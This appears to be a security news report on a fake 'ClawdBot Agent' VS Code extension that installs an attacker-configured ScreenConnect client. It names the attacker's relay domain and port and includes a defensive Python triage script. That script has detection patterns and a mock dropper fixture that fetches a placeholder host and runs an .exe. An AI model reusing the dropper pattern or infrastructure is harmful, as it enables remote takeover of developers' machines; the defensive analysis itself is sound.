Beware of Weaponized VS Code Extension Named ClawdBot Agent that Deploys ScreenConnect RAT

A malicious VS Code extension has surfaced in the digital threat landscape, targeting developers who rely on coding tools daily.

Discovered on January 27, 2026, the fake “ClawdBot Agent” extension presented itself as a legitimate AI-powered assistant, but it concealed a dangerous payload underneath.

Unlike the actual Clawdbot service, which never released an official VS Code extension, this imposter successfully registered the name first and tricked users into installing it.

The threat immediately caught the attention of security monitoring systems, which detected unusual activity the moment VS Code launched.

The deception runs deeper than a simple name theft. The extension functioned exactly as advertised, integrating with popular AI providers including OpenAI, Anthropic, and Google.

This working functionality created a false sense of security, as users had no reason to suspect malicious behavior.

Within seconds of installation, the extension began its attack, silently deploying malware onto Windows machines without user knowledge or consent. Microsoft acted swiftly upon notification and removed the extension from its marketplace.

Aikido security analysts identified the true nature of this threat after detailed investigation. They discovered that the extension contained code designed to run automatically every time VS Code started.

The JavaScript code established a connection to an external server to fetch configuration instructions, which then downloaded and executed multiple malicious files disguised as legitimate system components.
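The startup-time behavior described above (an extension activated on every launch whose main script reaches out to a remote server and then runs what it downloads) is something a defender can triage locally. The following script is an added example, not code from the article or from Aikido: it walks an extensions directory, reads each package.json for startup activation events, and flags main scripts that combine remote fetching with process or binary handling. The fixtures it builds are constructed stand-ins with placeholder values, not the real extension.

```python
import json
import re
import tempfile
from pathlib import Path

# Activation events that make an extension run on every VS Code launch.
STARTUP_EVENTS = {"*", "onStartupFinished"}

# Heuristic markers for the pattern described above: auto-start combined with a
# remote fetch and process/binary handling. Legitimate extensions can match too,
# so the output is a review queue, not a verdict.
RISKY_PATTERNS = {
    "spawns processes": re.compile(r"child_process|\b(?:exec|execFile|spawn)\s*\("),
    "fetches remote content": re.compile(r"https?\.(?:get|request)\s*\(|\bfetch\s*\("),
    "handles native binaries": re.compile(r"\.(?:exe|dll|msi)\b"),
}

def triage_extension(ext_dir: Path) -> dict:
    """Inspect one installed extension directory (package.json plus its main script)."""
    manifest = json.loads((ext_dir / "package.json").read_text(encoding="utf-8"))
    autostart = bool(set(manifest.get("activationEvents", [])) & STARTUP_EVENTS)
    main_path = ext_dir / manifest.get("main", "")
    findings = []
    if main_path.is_file():
        src = main_path.read_text(encoding="utf-8", errors="ignore")
        findings = [k for k, rx in RISKY_PATTERNS.items() if rx.search(src)]
    return {"name": manifest.get("name", ext_dir.name), "autostart": autostart,
            "findings": findings, "review": autostart and len(findings) >= 2}

def triage_all(extensions_root: Path) -> list:
    """Triage every extension directory under e.g. ~/.vscode/extensions."""
    return [triage_extension(d) for d in sorted(extensions_root.iterdir())
            if (d / "package.json").is_file()]

def build_fixtures() -> Path:
    """Constructed fixtures, not the real extension: one benign, one mimicking the
    auto-start + remote config + dropper pattern with placeholder values."""
    root = Path(tempfile.mkdtemp())
    benign = root / "good.formatter-1.0.0"
    benign.mkdir()
    (benign / "package.json").write_text(json.dumps(
        {"name": "formatter", "main": "ext.js", "activationEvents": ["onLanguage:python"]}))
    (benign / "ext.js").write_text("const vscode = require('vscode');\n")
    fake = root / "imposter.agent-0.0.1"
    fake.mkdir()
    (fake / "package.json").write_text(json.dumps(
        {"name": "imposter-agent", "main": "extension.js", "activationEvents": ["*"]}))
    (fake / "extension.js").write_text(
        "const https = require('https'); const { execFile } = require('child_process');\n"
        "https.get('https://config.invalid/cfg', () => {}); execFile('update.exe');\n")
    return root
```

Point `triage_all` at `~/.vscode/extensions` (or `%USERPROFILE%\.vscode\extensions` on Windows) to run it against real installs; entries with `review` set are the ones to read by hand.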

Infection Mechanism and ScreenConnect Deployment

The most concerning aspect involves how the attackers weaponized legitimate remote access software.

When executed, the dropper deployed ScreenConnect, a trusted IT support tool, configured to communicate with attacker-controlled servers at meeting.bulletmailer.net on port 8041.

The attackers created their own ScreenConnect relay server and pre-configured client installers, distributing them through the VS Code extension.

Victims unknowingly received a fully functional ScreenConnect client that immediately established remote connections to the attacker’s infrastructure.

A Rust-based DLL file provided redundant delivery capability, fetching backup payloads from Dropbox disguised as a Zoom update.

This multi-layered approach ensured success even if primary command-and-control servers were disabled. The attackers employed three separate fallback mechanisms, demonstrating sophisticated operational planning.

Users who installed this extension should immediately uninstall it, remove ScreenConnect from their systems, and block the infrastructure domains.

Rotating API keys for any AI services accessed through the extension is strongly recommended. The threat underscores the importance of verifying extension authenticity before installation.
